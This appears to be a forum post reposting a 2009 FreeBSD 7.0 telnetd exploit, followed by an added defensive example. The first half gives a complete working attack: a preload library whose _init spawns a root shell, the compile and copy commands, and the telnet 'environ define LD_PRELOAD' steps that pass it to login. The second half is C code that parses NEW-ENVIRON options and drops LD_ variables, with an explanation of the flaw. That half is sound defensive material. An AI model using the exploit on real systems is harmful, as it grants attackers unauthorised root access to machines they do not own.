I didn't expect anyone would still be looking into this; it surprised me when I saw it. The problem is in the telnetd part. It was tested successfully on FreeBSD 7.0-RELEASE, and 7.1 seems to have the same problem, but that has not been tested. Anyone interested can debug it themselves. The code is as follows:

/*
 * FreeBSD telnetd local/remote privilege escalation/code execution
 * remote root only when accessible ftp or similar available
 * tested on FreeBSD 7.0-RELEASE
 * by Kingcope/2009
 */
#include <stdio.h>
#include <stdlib.h>

/* Runs when the dynamic linker maps this library via LD_PRELOAD (the
 * library is linked with -nostartfiles, so this _init is ours). telnetd
 * passes the client-supplied LD_PRELOAD through to /usr/bin/login, which
 * it execs as root, so the payload runs as root. */
void _init() {
    FILE *f;
    /* Clear LD_PRELOAD first so the shell and its children do not map
     * this library again and re-run the payload on every exec. */
    setenv("LD_PRELOAD", "", 1);
    system("echo ALEX-ALEX;/bin/sh");
}
---snip-----
Then we compile this stuff.
---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-----
Then we copy the file to a known location (local root exploit)
---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----
...or we upload the library through any other available attack vector. After that we telnet to the remote or local FreeBSD telnet daemon, having first set the LD_PRELOAD environment variable to the known location as a telnet option.
---snip-----
#telnet
telnet> auth disable SRA
telnet> environ define LD_PRELOAD /tmp/libno_ex.so.1.0
telnet> open target
---snip-----
ALEX-ALEX
#ROOTSHELL
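The step that makes the exploit work is "environ define": the telnet client sends LD_PRELOAD inside a NEW-ENVIRON (RFC 1572) suboption, and the vulnerable telnetd copied it unfiltered into the environment it handed to /usr/bin/login. The dynamic linker's set-user-ID protection does not help, because login is started by a telnetd that is already root, so nothing looks set-uid from rtld's point of view; the check has to live in telnetd. The C below is an added example, not Kingcope's code and not FreeBSD's telnetd: it parses a NEW-ENVIRON IS body into name/value pairs (honouring the ESC byte), then applies a policy that refuses anything in the LD_ namespace before building login's environment. The sample bytes are constructed, the deny-list on the LD_ prefix is an assumption (a production daemon should allow-list instead), and the option-layer framing (IAC SB/SE, IAC doubling) is assumed to have been handled already.

```c
#include <stdio.h>
#include <string.h>

/* RFC 1572 NEW-ENVIRON codes: what "environ define" puts on the wire
 * inside IAC SB NEW-ENVIRON IS ... IAC SE */
#define NE_VAR 0
#define NE_VALUE 1
#define NE_ESC 2
#define NE_USERVAR 3
#define ENVSTR_MAX 320

struct envpair { char name[64]; char value[256]; };

/* Constructed sample, not a capture: the IS body for
 * "environ define LD_PRELOAD /tmp/libno_ex.so.1.0" plus an exported TERM.
 * Assumes the option layer already stripped IAC SB/SE and un-doubled IAC. */
static const unsigned char sample_is[] = {
    NE_VAR, 'L','D','_','P','R','E','L','O','A','D',
    NE_VALUE, '/','t','m','p','/','l','i','b','n','o','_','e','x','.','s','o','.','1','.','0',
    NE_VAR, 'T','E','R','M', NE_VALUE, 'x','t','e','r','m'
};

/* Copy one name or value out of buf, honouring ESC. Stops at VAR/USERVAR
 * (and at VALUE when reading a name). Returns bytes consumed, or (size_t)-1
 * if the token is malformed or too long. */
static size_t read_token(const unsigned char *buf, size_t len, char *dst, size_t cap, int is_name)
{
    size_t i = 0, k = 0;
    while (i < len) {
        unsigned char c = buf[i];
        if (c == NE_VAR || c == NE_USERVAR) break;
        if (c == NE_VALUE) { if (is_name) break; return (size_t)-1; }
        i++;
        if (c == NE_ESC) {                  /* next byte is literal */
            if (i >= len) return (size_t)-1;
            c = buf[i++];
        }
        if (k + 1 >= cap) return (size_t)-1;
        dst[k++] = (char)c;
    }
    dst[k] = '\0';
    return i;
}

/* Parse a NEW-ENVIRON IS body into pairs; returns the count, or -1 if malformed. */
int parse_new_environ(const unsigned char *buf, size_t len, struct envpair *out, int max)
{
    int n = 0;
    size_t i = 0, used;
    while (i < len) {
        if ((buf[i] != NE_VAR && buf[i] != NE_USERVAR) || n >= max) return -1;
        i++;
        struct envpair *p = &out[n];
        used = read_token(buf + i, len - i, p->name, sizeof p->name, 1);
        if (used == (size_t)-1 || p->name[0] == '\0') return -1;
        i += used;
        p->value[0] = '\0';
        if (i < len && buf[i] == NE_VALUE) {
            used = read_token(buf + i + 1, len - i - 1, p->value, sizeof p->value, 0);
            if (used == (size_t)-1) return -1;
            i += used + 1;
        }
        n++;
    }
    return n;
}

/* Policy: what the client may put into login's environment. Assumption: a
 * deny-list on the LD_ prefix (the dynamic-linker namespace the exploit
 * abuses); a production daemon should allow-list TERM/DISPLAY/... instead. */
int env_allowed(const char *name) { return strncmp(name, "LD_", 3) != 0; }

/* Build the NAME=value strings that would be passed to login; returns the number kept. */
int build_login_env(const struct envpair *pairs, int n, char out[][ENVSTR_MAX], int max)
{
    int kept = 0;
    for (int j = 0; j < n && kept < max; j++) {
        if (!env_allowed(pairs[j].name)) continue;
        snprintf(out[kept++], ENVSTR_MAX, "%s=%s", pairs[j].name, pairs[j].value);
    }
    return kept;
}

int main(void)
{
    struct envpair pairs[8];
    char env[8][ENVSTR_MAX];
    int n = parse_new_environ(sample_is, sizeof sample_is, pairs, 8);
    for (int j = 0; j < n; j++)
        printf("client: %s=%s -> %s\n", pairs[j].name, pairs[j].value,
               env_allowed(pairs[j].name) ? "kept" : "dropped");
    int kept = build_login_env(pairs, n, env, 8);
    for (int j = 0; j < kept; j++) printf("login env: %s\n", env[j]);
    return 0;
}
```

Run against the sample, LD_PRELOAD=/tmp/libno_ex.so.1.0 is parsed but dropped and only TERM=xterm reaches login; with the check removed the behaviour is exactly the vulnerable one the post exploits. The parser stops on a bare VALUE inside a value and on a missing name, so a client cannot smuggle a second variable past the policy by malforming the suboption.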